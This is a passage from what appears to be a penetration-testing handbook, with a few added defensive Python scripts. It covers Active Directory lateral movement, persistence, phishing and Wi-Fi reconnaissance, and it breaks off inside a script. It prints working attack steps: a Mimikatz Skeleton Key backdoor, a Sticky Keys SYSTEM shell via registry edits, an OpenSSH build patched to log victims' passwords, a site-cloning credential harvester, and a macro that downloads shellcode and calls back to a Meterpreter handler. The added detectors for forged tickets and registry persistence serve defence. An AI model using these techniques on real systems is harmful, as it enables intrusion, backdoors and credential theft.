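From the defender's side, the listing above carries two tells of a forged ticket: a ten-year lifetime (2015 to 2025) where the domain would never issue more than its policy maximum, and a realm of "hacker" instead of HACKER.TESTLAB. The following Python is an added example, not code from the book or from the kiwi extension; it assumes the listing has been normalized into pipe-separated columns (server, client, start, end, flags) and uses the Active Directory default of 10 hours for "Maximum lifetime for user ticket".

```python
"""Flag Kerberos tickets whose lifetime or realm look forged.

Added example, not code from the book or from mimikatz/kiwi. Input is a
constructed, pipe-separated rendering of the columns the kiwi listing shows
(server, client, start, end, flags).
"""
from datetime import datetime, timedelta

EXPECTED_REALM = "HACKER.TESTLAB"           # the chapter's lab domain
MAX_TICKET_LIFETIME = timedelta(hours=10)   # AD default "Maximum lifetime for user ticket"
TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed sample: two legitimate testuser1 tickets (10-hour lifetime) and
# the forged "lab" Golden Ticket from the chapter (2015 to 2025, realm "hacker").
SAMPLE_TICKETS = """\
LDAP/DC.hacker.testlab/hacker.testlab @ HACKER.TESTLAB | testuser1 @ HACKER.TESTLAB | 2015-01-06 05:22:32.000 | 2015-01-06 15:22:32.000 | NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB | testuser1 @ HACKER.TESTLAB | 2015-01-08 02:11:20.000 | 2015-01-08 12:11:20.000 | NAME_CANONICALIZE, PRE_AUTHENT, INITIAL, RENEWABLE, FORWARDABLE
krbtgt/hacker @ hacker | lab @ hacker | 2015-01-07 08:37:54.000 | 2025-01-07 08:37:54.000 | FORWARDABLE
"""


def parse_tickets(text):
    """Turn the pipe-separated listing into a list of ticket dicts."""
    tickets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        server, client, start, end, flags = [f.strip() for f in line.split("|")]
        tickets.append({
            "server": server,
            "client": client,
            "start": datetime.strptime(start, TIME_FMT),
            "end": datetime.strptime(end, TIME_FMT),
            "flags": [f.strip() for f in flags.split(",") if f.strip()],
        })
    return tickets


def realm_of(principal):
    """'name @ REALM' -> 'REALM'."""
    return principal.rsplit("@", 1)[1].strip()


def find_suspicious(tickets, expected_realm=EXPECTED_REALM,
                    max_lifetime=MAX_TICKET_LIFETIME):
    """Return (client, server, reasons) for every ticket that breaks policy.

    A KDC never issues a ticket longer than the domain's maximum lifetime, so a
    ten-year ticket can only have been built offline with the krbtgt key. A
    realm that does not match the domain exactly (case included) was typed in
    by whoever forged the ticket, not filled in by this domain's KDC.
    """
    findings = []
    for t in tickets:
        reasons = []
        lifetime = t["end"] - t["start"]
        if lifetime > max_lifetime:
            reasons.append(f"lifetime {lifetime} exceeds policy maximum {max_lifetime}")
        for role in ("server", "client"):
            realm = realm_of(t[role])
            if realm != expected_realm:
                reasons.append(f"{role} realm {realm!r} != expected {expected_realm!r}")
        if reasons:
            findings.append((t["client"], t["server"], reasons))
    return findings


if __name__ == "__main__":
    for client, server, reasons in find_suspicious(parse_tickets(SAMPLE_TICKETS)):
        print(f"SUSPICIOUS {client} -> {server}")
        for r in reasons:
            print(f"    {r}")
```

The same two checks apply to klist output on a workstation or to ticket fields in event logs; only the parser changes.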


With the Golden Ticket, we have access to servers, and can drop files, but how can we execute 
commands using the Kerberos Domain Admin Ticket? 


As shown in prior chapters, WMIC supports the ability to execute remote commands. This command 
uses the current Kerberos tickets against a remote server (the node). We are going to execute a ping 
command and write its output to a file on a remote Windows 8 server, from our compromised Windows 7 
Golden Ticket box. 


• wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create "cmd /c ping 127.0.0.1 > C:\log.txt" 


C:\Users\testuser1\Desktop>wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create "cmd /c ping 127.0.0.1 > C:\log.txt" 
Executing (Win32_Process)->Create() 
Method execution successful. 

Out Parameters: 
instance of __PARAMETERS 
{ 
        ProcessId = 4676; 
        ReturnValue = 0; 
}; 

WMI and Kerberos Ticket 


Double-checking our Windows 8 host, we see that the command was successful and we can now 
move laterally throughout the whole domain. 


[Screenshot: Windows 8 x64, Explorer showing C:\ (PerfLogs, Program Files, Program Files (x86), Users, Windows, log.txt) with C:\log.txt open in Notepad] 

Pinging 127.0.0.1 with 32 bytes of data: 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 

Ping statistics for 127.0.0.1: 
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
    Minimum = 0ms, Maximum = 0ms, Average = 0ms 

Validate Command Execution 


Skeleton Key 


As a penetration tester, one of your greatest resources is monitoring what the real bad guys are doing. 
For example, Dell Secureworks identified malware that would backdoor privileged Active Directory 
accounts: 





Luckily for us, Benjamin Delpy and his amazing tool Mimikatz implemented the Skeleton Key feature. 
{28} This attack backdoors a Domain Administrative account. Let’s say you have already gained 
a domain admin account and were able to log into a domain controller (remember, you will have 
to do this on every domain controller in the environment). We can put a copy of our modified 
Mimikatz on there so we don’t trigger antivirus. 


To install our Skeleton Key is pretty easy: 


• mimikatz.exe "privilege::debug" "misc::skeleton" exit 


[Screenshot: Windows Server 2012, mimikatz] 
mimikatz(commandline) # misc::skeleton 
[KDC] data 
[KDC] struct 
[KDC] keys patch OK 
[RC4] functions 
[RC4] init patch OK 
[RC4] decrypt patch OK 

Skeleton Key 


If we go back to any computer on the network and try to connect to the Domain Controller, of course 
we won’t have access with our regular Active Directory account. We try to run “dir \\dc\c$” to read 
the C-Drive on the domain controller. But don’t forget about our skeleton key. 


Even if we don’t know the password of the domain admin account “lab”, with the Skeleton Key 
implemented, we can use the new backdoor password of "mimikatz". 


To demonstrate this we can mount a drive from any computer on the network using the password 
"mimikatz" and the “lab” account from which we executed the skeleton key. 


In the first command (dir \\dc\c$) we try to read files from the domain controller, but are unsuccessful. 
Next, we mount a share drive to the domain controller's C-Drive using the “lab” account and the 
backdoor password “mimikatz”: 
• net use * \\dc\c$ mimikatz /user:lab@hacker.testlab 





[Screenshot: net use with the backdoor password, followed by a directory listing of the DC's C$ share] 
... Dir(s) 20,905,398,272 bytes free 

Skeleton Key - Backdoor Password 


We now have full access into the domain controller with our backdoor password. Both the original 
domain admin’s password and mimikatz will work at the same time. 


Sticky Keys 


Sticky Keys is one of my favorite persistence methods. If you have never dealt with sticky keys 
before, try hitting shift 5 times on any Windows host. Microsoft states that: 


"StickyKeys is designed for people who have difficulty holding down two or more keys at a time. 
When a shortcut requires a key combination such as Ctrl+P, StickyKeys allows you to press one key 
at a time instead of pressing them simultaneously." {29} 


We can take advantage of sticky keys by replacing the sticky key executable with a shell. The old 
method used to manually replace sethc with cmd, but this can now be done within registry settings. 


• REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" 
• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 
• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 


Two additional settings you might need to run: 

• Change the firewall setting to allow RDP 
  ◦ netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 
• Enable Remote Desktop Connections 
  ◦ REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 


Don't forget the power of WMI and being able to trigger these settings remotely. Remember, you will 
need a privileged local administrator account or a domain admin account. 
• wmic /user:[User Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f" 
• wmic /user:[User Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" 
• wmic /user:[User Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v SecurityLayer /t REG_DWORD /d 0 /f" 


Optional Commands: 
• wmic /user:[User Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" 
• wmic /user:[User Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f" 


Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing 
the username/password to /authority:"Kerberos:[Domain]\[Server]". Remember pass the ticket? 


Once we have configured these registry settings, we can RDP to that host without any credentials, hit 
shift 5 times, and we have a system shell. 


If you ever lose your original shell and the user changes their password, you still have your backdoor. 


[Screenshot: Windows Server 2012 R2 RDP logon screen with a SYSTEM command prompt opened by pressing shift five times] 
Sticky Keys 





Conclusion 


I hope this chapter was able to get you comfortable with getting onto the network and moving laterally 
through the network. There are a large number of attacks that can help in both lateral movement and 
privilege escalation, but it really comes down to understanding what is in scope of your test and what 
has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement 
section to get you to a Domain Administrator, but keep this chapter handy as sometimes you will run 
into a brick wall and something in this book might just get you out of a jam. 


The Screen - Social Engineering 


If client attacks are in the scope of your tests, social engineering is your "go to" attack. There are 
many different ways to perform social engineering attacks and these can range from domain attacks to 
spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own 
creativity, I will just go over a few examples that I have found to be fruitful. 


Doppelganger Domains 
I spent a lot of research time looking into doppelganger domains and trying to find the most efficient 
and most “bang for your buck” attacks. You can find more in my research paper here: 
http://www.wired.com/threatlevel/2011/09/doppelganger-domains/. 


The concept of my research paper was to brute-force company domains for valid subdomains that had 
MX records. For my next few examples we have two different fictitious companies who utilize their 
sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all 
domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently 
make the mistake of forgetting to type in the period between the domain and sub-domain. 


SMTP Attack 


Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set 
all SMTP servers as catch-all servers. This means that if anyone emails to the domain I own, 
regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. 


This is usually enough to prove that you can successfully capture sensitive data and that you will see a 
lot of sensitive emails from the corporation. If you go to the article above, you will see what type of 
data was gathered and how many times we were able to get SSH/VPN/Remote Access into a 
company. We also took this proof of concept attack one step farther. 


In the following example, we are targeting the fake site bank.com, which has a subsidiary in Russia. 
The fake bank owns ru.bank.com and has MX records to that FQDN. Also, company.com (another 
fake company), owns us.company.com and has MX records for that FQDN. In this fake example, we 
purchase both the doppelganger domains uscompany.com and rubank.com. If anyone mistypes an 
email to either domain, we will be able to inject ourselves into the middle of this conversation. Using 
a few simple python scripts, when we receive an email from john@us.company.com to 
bob@rubank.com (mistyped doppelganger for ru.bank.com), our script will take that email and create 
a new email to bob@ru.bank.com (the proper email address), sourced from 
john@uscompany.com (the mistyped doppelganger that we own). That means any reply from Bob to 
John will come back through us. Now, we have a full "Man in the MailBox" configured and 
can either just passively listen or attack the victims based on the trust factor they have with each 
other. 





Man in the MailBox (MITMB) 

Original E-mail Conversation: @us.company.com <-> @ru.bank.com 

MITMB: 
1. @us.company.com -> @rubank.com: E-mail sent to the wrong address 
2. @uscompany.com -> @ru.bank.com: Using the recipient doppelganger, we forward the request to the proper address after modifying the email 
3. @uscompany.com <- @ru.bank.com: The user at ru.bank.com responds back with the requested information 
4. @us.company.com <- @rubank.com: We respond to the original email with the information and the sender is unaware of the incident 
(rubank.com and uscompany.com are the domains under our control) 

Man in the MailBox Example 


SSH Attack 


During my research, I also configured SSH servers with the doppelganger domains to see if people 
mistyped SSH servers and revealed their SSH passwords. There are a couple of things that need to be 
configured for a successful attack. 


First, set the DNS A record to point all records to a particular IP. For example, I set the A record 
host to "*" and pointed the host record to my IP address. Any subdomain within the doppelganger will 
point back to my server. This means the following domains will all point back to a single IP: 

• test.uscompany.com 
• dev.uscompany.com 
• deadbeef.uscompany.com 


Then, set up an SSH server that logs both the username and password. In my case, I configured a 
server running Ubuntu 11.10. Since normal sshd does not record the passwords, I had to modify a 
version of sshd. This is done by downloading openssh portable 5.9p1: 

wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz 


To extract OpenSSH: 
• tar xvfz openssh-5.9p1.tar.gz 
• Go into the openssh directory: 
  ◦ cd openssh-5.9p1 

It is required to modify the auth-passwd.c file before compiling sshd. Below is what I changed, but I 
have also included the whole auth-passwd.c file that you should replace in sshd 
[https://www.securepla.net/download/auth-passwd.c]: {30} 


	if (!sys_auth_passwd(authctxt, password)) {
		/* Failed login attempt: record user, password and source IP.
		 * chmod() needs <sys/stat.h>. */
		FILE *garp;

		garp = fopen("/var/log/sshd_logged", "a");
		if (garp != NULL) {
			chmod("/var/log/sshd_logged", 0600);
			fprintf(garp, "%s:%s:%s\n", authctxt->user, password,
			    get_remote_ipaddr());
			fclose(garp);
		}
	}
	return (result && ok);


Now, when I have an invalid login, I write out the username, password, and IP address into a file 
located at /var/log/sshd_logged. 
After replacing the auth-passwd.c file, let's compile and make it: 

• sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh 
• make 
• sudo make install 


You should now have a working version of the new sshd service. To start sshd: 
• /opt/sbin/sshd 


Then, run the following command and you should see username/password combinations scroll by: 
• tail -f /var/log/sshd_logged 


Output: 
• root:Harmon01:192.168.10.10 
• admin:AMW&369!:192.168.10.111 
• tomihama:tomihhama:192.168.10.24 
• root:hx7wnk:192.168.10.19 


We are successfully recording username/password combinations. You will have to be extremely 
patient with this attack and hope a developer or IT user mistypes the domains to SSH. I love these 
attacks because they are not the normal types of attacks and give you the chance to get creative with 
them. 


Phishing 


Phishing, or email in general, is one of the most commonly used and effective vectors for remote 
attacks. This is because they rely on users as victims, instead of unpatched or misconfigured services. 


Victims can be easily swayed to perform actions generally based on fear and urgency. The fear and/or 
urgency usually stems from some type of financial loss, personal loss, or the fear of missing out. If 
you can trigger one of these emotions, it can cause a victim to do things they wouldn’t normally do. 
Although there are numerous books on manipulating people, two books I would recommend are: 

• Behavioral Programming (2015): The Manipulation of Social Interaction - http://amzn.to/1CJGb4y 
• Social Engineering: The Art of Human Hacking (2010) - http://amzn.to/1CIH3pOQ 


These books describe types of social interactions, manipulation of people, word selection, and many 
tools for all methods of social engineering. 


In the first THP, I focused on using Metasploit pro, but I decided to go with open source in this 
example, which allows me to get more creative. After setting up a few phishing exercises, you will 
see that it is pretty easy. 


There are plenty of open source phishing tools, such as: 

• Cartero: http://section9labs.github.io/Cartero/ 
• Phishing Frenzy: http://www.phishingfrenzy.com/ 
• Social Engineering Toolkit: https://github.com/trustedsec/social-engineer-toolkit 


However, after running numerous phishing attacks, I found that having numerous custom scripts ready 
for different scenarios works best. Although this might not work for your situation, this should help 
you get different ideas for a successful campaign. 


Manual Phishing Code (https://github.com/cheetz/spearphishing) (Kali Linux): 


This is sample beta code I have written to take care of my spear phishing campaigns. The code 
repository is located at https://github.com/cheetz/spearphishing, and it is really up to you to 
customize it for your own campaign. In the default code, we are going to use GoDaddy's SMTP 
services, but you can easily customize it for your own SMTP server. The spear.py client 
script will modify an HTML page that gets sent to all its victims. Take time to read and understand 
the code before executing it. Let's walk through a phishing example. 

Setting up the client to send out emails: 
• cd /opt/spearphishing/client 
• edit spear.py and modify the following: 
  ◦ domain = "suck.yourdomainthatyouown.com" #The Domain That You Own 
  ◦ company_name = "SUCK" #The Company Name 
  ◦ me = "auto-confirm@" + domain #Email return address 
  ◦ host = 'smtpout.secureserver.net' #Godaddy SMTP server 
  ◦ login = '' #Godaddy Login 
  ◦ password = '' #Godaddy password 
• edit emails.txt and add email addresses 


To run the SMTP script: 
• python ./spear.py 


[Screenshot: Gmail inbox showing the phishing email] 
From: auto-confirm@suck.alertsmonitor.com 
Subject: Your Suck order of "2" x TV Stick 
Body: an "Order Confirmation" styled like a retailer's, thanking the victim for shopping with us, with an estimated delivery date, a shipping address, "Two-Day Shipping", a gift card offer, and the order details "2 x TV Stick $39.00". Hovering a link shows https://suck.alertsmonitor.com/?id_session=...&ge=... 

Sample Spearphishing Email 


If you look closely at the bottom, all URLs point to our domain with both the session ID and ge ID. 
One thing you need to do is heavily test your phishing exercises. There are some phishing campaigns 
that get flagged as SPAM and others that don’t. You need to find that right balance. 


Web Filtering Bypass for Your Domains: 
Once in a while, I will see a company actively using a web proxy for all of their Internet traffic. In 
this situation, anything that isn't categorized will be blocked and my reverse shells can’t seem to work 
around their filter. However, there are things you can do to help your success rate. For doppelganger 
domains that I have purchased specifically for testing, I set up a simple CNAME or Canonical Name 
on that domain to point to the original domain that I have doppelgangered. I will let that doppelganger 
domain sit there for a few days or weeks before the test. Why? This will allow the site to get 
automatically crawled by a number of different systems. When the crawlers see the CNAME 
configured to the real site, they will assume that it was purchased by that company and turn that 
domain into the same category of approved domains. Once your test starts, just remove the CNAME 
and configure the IP of the actual malicious server. 


Setting Up the Server: 


We are going to set up a web server that will look like a real authentication page to capture 
credentials. 

• cd /opt/set 
• ./setoolkit 
• 1) Social-Engineering Attacks 
• 2) Website Attack Vectors 
• 3) Credential Harvester Attack Method 
• 2) Site Cloner 
• set:webattack> IP address for the POST back in Harvester/Tabnabbing: [your Kali IP] 
• set:webattack> Enter the url to clone: [Website to Clone] 







[Screenshot: SET terminal] 
[-] This option is used for what IP the server will POST to. 
[-] If you're using an external IP, use your external IP for this 
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192... 
[-] SET supports both HTTP and HTTPS 
[-] Example: http://www.thisisafakesite.com 
set:webattack> Enter the url to clone: https://suck.testlab 

All files have been copied to /var/www 
[Press return to continue] 

Social Engineering Toolkit - Clone Site 


Let's make some quick modifications. To help make spear phishing more successful, make sure it 
looks authentic and minimize the amount of information the user needs to input. A simple way to 
accomplish this is to add their email address in the login field. This makes it look like they have 
logged onto this site before. 


Once you have cloned a site, all files are copied to /var/www. Let's modify the files: 
1. cd /var/www 
2. We need to make the file able to support server-side scripting: 
   mv index.html index.php 
3. We need to identify the username field. If we open the original login page, right-click in the 
Username field, and choose Inspect Element (in Firefox), we can quickly see where the code for this 
field is and modify our file to include the victim’s email address. 


[Screenshot: Firefox right-click menu on the Username field of the original login page, with "Inspect Element" selected and the Inspector showing the field's HTML] 

Fake Login Page 


4. gedit index.php and locate the code from step 3 (in this specific scenario, we can search for the 
login field) and add the code below. 4a automatically appends the user’s email in the login 
field, and 4b is used solely for tracking purposes. 
   a. Inside the login input field, add: value="<?php if(isset($_GET['ge'])) { echo base64_decode($_GET['ge']); } ?>" 
   b. Somewhere below, add: <input type="hidden" name="user_id" value="<?php print $_GET["id_session"]; ?>"/> 

Code Modifications to Include User Email Address 


Now, we can go visit the cloned website we created. If we add two additional parameters to the 
index.php page, we can see how this small change can increase our success rate. The ge field accepts 
a base64 string, “Ym9va0B0aGVoYWNrZXJwbGF5Ym9vay5jb20=”, which decodes to 
book@thehackerplaybook.com. There is also an id_session field that is just an MD5 of the original 
email address. I do this so that, in the event they decide to change the username email address to a different 
email address, I will know which original user is inputting these requests. 


[Screenshot: the cloned page at suck.testlab/index.php?... with the Username field pre-filled as book@thehackerplaybook.com] 

Login with User Email 


When anyone types in their password and hits the “Sign in" button, this information will all be logged 
to a file called harvester, along with the date. Let's read the file with: cat harvester* 


# cat harvester* 
Array 
( 
    [authenticity_token] => 8nU5hP60AAKZo5KAw== 
    [login] => book@thehackerplaybook.com 
    [user_id] => 58330bcfdb5c499194603048c3810134 
    [password] => happyhacking! 
    [commit] => Sign in 
) 
# 

Password Results 


The reason I go through the manual method of creating spear phish emails and client servers, is to 
have it look as authentic and specific as possible. There are a lot of different tools that can be 
purchased to provide spear phishing campaigns, but most are limited in the types of sites or templates 
that are included. 


Social Engineering with Microsoft Excel 


In the first book, I explained how to add macros manually to create malicious Excel payloads that can 
be used in Spear Phishing Campaigns. This section is an extension of that. 


Sometimes you find yourself in an environment where you can't use JAVA or web-based attacks. It 
might be because you have to deliver your payload via an email attachment or want to use physical 
media for your attack (i.e. USB sticks or CDs). One of the best success rates I have had with these 
types of attacks was by utilizing a trust relationship between the attacker and victim and including an 
Excel spreadsheet that had a Meterpreter payload. When I say a trust relationship, I mean find 
someone with whom the victim might regularly exchange files and spoof his or her email address. 
Even better, in the initial Compromised List section, you might have been able to gain a few 
credentials. Log into the corporate Outlook Web Access (OWA) mail server and start emailing 
employees that have regular communication with your compromised credential. 

The problem with using Metasploit to generate its own Excel files is that a lot of times they will 
trigger anti-virus. To mitigate this, we are going to use the same tactics we did in the Lateral 
Movement section and take advantage of PowerShell. 


On your Windows attacking host, download Generate-Macro.ps1: 
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1 


Generate-Macro.ps1 creates a malicious Excel file with a PowerShell payload that connects back to a 
Metasploit Meterpreter handler. It even goes one step farther and adds persistence by creating a .vbs 
file in C:\Users\Public and adding a registry setting to call that script upon bootup. 


C:\Users\hp2\Downloads\Generate-Macro-master>powershell -exec bypass 

PS C:\Users\hp2\Downloads\Generate-Macro-master> .\Generate-Macro.ps1 

Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): 
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1 

Enter IP Address: 192.168.199.128 

Enter Port Number: 443 

Enter the name of the document (Do not include a file extension): records 


-------- Select Attack--------- 

1. Meterpreter Shell with Logon Persistence 

2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local 
admin) 

3. Meterpreter Shell with Microsoft Outlook Email Persistence 


1. Meterpreter Reverse HTTPS 
2. Meterpreter Reverse HTTP 


Select Payload Number & Press Enter: 1 
Saved to file C:\Users\hp2\Desktop\records.xls 


Next, we need to setup our standard Meterpreter Handler: 
e cd /opt/ 
e msfconsole -r ./listener.rc 


Open up the Excel file: 
[Screenshot: the generated records.xls opened in Excel] 
Excel Malicious File 


Here is the Macro File that was generated by the PowerShell Script: 

[Screenshot: VBA editor showing the macro module generated by Generate-Macro.ps1] 

Malicious Macro File 


When you enable the Macro, it will connect back to your Kali Meterpreter handler: 





Excel Execution - Meterpreter 


The script will also add persistence. It creates a file in C:\Users\Public called config.vbs. It also 
creates a registry entry under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 
to start that vbs file upon bootup. 


So, every time this system reboots, the PowerShell script will download invoke-shellcode and 
connect back to your Meterpreter handler. 
Registry Persistence 
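Both persistence mechanisms in this chapter, the Sticky Keys backdoor (an IFEO Debugger on sethc.exe together with the RDP-Tcp and fDenyTSConnections changes) and the HKCU ...\Windows\Load autorun this macro adds, live in a handful of registry values, so a defender can audit for them. The Python below is an added example, not the book's or Generate-Macro's code; it parses the text that the Windows "reg query" command prints for those keys (the sample output is constructed) and reports which of the chapter's settings are present.

```python
"""Audit "reg query" output for the persistence settings used in this chapter.

Added example, not code from the book. It parses the text the Windows
"reg query" command prints (constructed sample below) and flags the Sticky
Keys backdoor (IFEO Debugger on sethc.exe), the RDP settings that go with it,
and the legacy HKCU ...\Windows\Load autorun used by the Excel macro payload.
"""
import re

# Constructed sample of "reg query" output collected from a host: key paths
# are unindented, values are indented "name    type    data".
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
    SecurityLayer    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
    Load    REG_SZ    C:\Users\Public\config.vbs
"""


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from reg query output."""
    keys = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():          # unindented line: a key path
            current = raw.strip()
            keys.setdefault(current, {})
            continue
        # indented line: "name<spaces>type<spaces>data"; data may hold single spaces
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if current is None or len(parts) < 2:
            continue
        name, vtype = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""
        keys[current][name] = (vtype, data)
    return keys


def _dword(data):
    """reg query prints REG_DWORD data as hex, e.g. 0x0."""
    return int(data, 16) if data.lower().startswith("0x") else int(data)


def audit(keys):
    """Return (severity, message) for each of the chapter's settings found."""
    findings = []
    for path, values in keys.items():
        low = path.lower()
        if low.endswith(r"\image file execution options\sethc.exe") and "Debugger" in values:
            findings.append(("HIGH", f"sethc.exe has an IFEO Debugger: {values['Debugger'][1]}"))
        if low.endswith(r"\terminal server\winstations\rdp-tcp"):
            if "UserAuthentication" in values and _dword(values["UserAuthentication"][1]) == 0:
                findings.append(("MEDIUM", "RDP Network Level Authentication disabled (UserAuthentication=0)"))
            if "SecurityLayer" in values and _dword(values["SecurityLayer"][1]) == 0:
                findings.append(("MEDIUM", "RDP SecurityLayer=0 (legacy RDP security, no TLS)"))
        if low.endswith(r"\control\terminal server") and "fDenyTSConnections" in values:
            if _dword(values["fDenyTSConnections"][1]) == 0:
                findings.append(("INFO", "Remote Desktop connections enabled (fDenyTSConnections=0)"))
        if low.endswith(r"\windows nt\currentversion\windows") and "Load" in values:
            findings.append(("HIGH", f"legacy Load autorun set: {values['Load'][1]}"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"[{severity}] {message}")
```

On a live host, run reg query against the five keys named in the sample and feed the combined output to parse_reg_query; a clean host yields an empty or INFO-only list.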


I ran these Excel files through numerous AV tools and not a single one triggered. As long as you can 
get a user to enable the Macro, you are good to go. 


Phishing Reporting 


As stated many times throughout this book, the most important part of any test is reporting. I have 
linked a sample phishing report that you can use as a template. 
e Work with the security team to figure out how many users reported the phish 
e Record information that includes how many users clicked/opened the attachment and 
how many conversions (i.e. entered password/executed malicious files) 
e Identify if the security team would have been notified by their users if this had been 
a real attack 
e Since every social engineering attack is very different, a section should include 
reasons for successes or failures 
e Remediation plan or areas to improve results 


I haven't seen many public templates for phishing campaigns, but have 
included a sample report at: 
http://thehackerplaybook.com/Download/2015_RT_Phishing_SUCK_REPORT.pdf. 


The Onside Kick - Attacks That Require Physical 
Access 


The onside kick is a dangerous tactic that provides huge beneficial results. The problem with these 
types of attacks is that they generally require close proximity and have high potential of alarming your 
victim. In this chapter, I will explain how to exploit wireless networks, card cloning, creating a 
penetration drop box, and dropping USB sticks. Please remember, if you are going to do these types 
of attacks, then get written approval from the company with which you are working. 


Exploiting Wireless 

Before we begin talking about exploiting wireless, I want to state that many of the basic attacks for 
WIFI haven’t changed from the previous book. To eliminate the need to carry two books, I have 
included the relevant WIFI material from the last book along with the newer attacks. 


I am often asked what the best card is for wireless sniffing and attacking. I don't have the exact 
technical comparison, but from my experience, I have had the most success and luck with the Alfa 
AWUS036NHA. {31} This USB wireless adaptor supports 802.11 a/b/g/n and works natively with 
Backtrack and Kali. This card also uses the Atheros chip set, of which I am a big fan. The reason that 
I use a USB wireless card is that my Kali system is generally a VM, which can't utilize the native 
built-in wireless card. 


Passive - Identification and Reconnaissance
Passive WIFI testing puts the WIFI card into a sniffing (monitor) mode to identify access points, clients, signal strengths, encryption types, and more. In passive mode, your system does not transmit to any of the devices; this mode is used purely for recon/identification.
To start any WIFI assessment, first kick off Kismet. Kismet is a great WIFI tool to sniff, identify, and monitor wireless traffic. At any terminal window in Kali, type:

• kismet


This will open the Kismet application, which will ask for your wireless interface (you can run a quick ifconfig in a separate terminal window to find it). In this case, my wireless interface is wlan1.


If everything works properly, you can close that window (try pressing the Tab key if you are stuck) and you will see a listing of all the SSIDs, channels, signal strengths, and more.


SSIDs and AP information


The colors of the different wireless networks represent the following:
• Yellow - Unencrypted network
• Red - Factory default settings in use
• Green - Secure network (WEP, WPA, etc.)
• Blue - SSID cloaking on / broadcast SSID disabled {32}


After selecting an SSID, you will immediately see information about that access point such as the BSSID, manufacturer, type of encryption (in this case WEP), and signal strength/packet loss. This is great for identifying where an access point is located and how we are going to attack it.


By pressing the "~" (tilde) key, then V, then C, you will see all the clients that are connected to this access point.


Finding Clients Connected to an AP


This client list is what you need for the de-authentication and denial of service attacks against the access point in the Active Attacks section: a deauth has to be aimed at a station that is actually associated.
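The same survey can be done from a capture file rather than by reading Kismet's screen. The script below is an added example for this chapter (not the book's code and not part of Kismet or aircrack-ng): it parses the CSV that airodump-ng writes with `-w <prefix>`, tags each access point the way Kismet's colour legend does (open, WEP, secure, cloaked SSID) and lists the stations associated with each BSSID, which is the list a targeted deauth is aimed at. The CSV embedded in it is constructed for the demonstration, not a real capture.

```python
"""Classify access points the way Kismet's colour legend does, and map clients to
the AP they are associated with, from an airodump-ng CSV dump.  Added example for
this chapter, not code from the book or from Kismet/aircrack-ng.  It assumes
airodump-ng's "-w <prefix>" CSV layout (<prefix>-01.csv); the sample below is
constructed for the demonstration, not a real capture."""
import csv
import io

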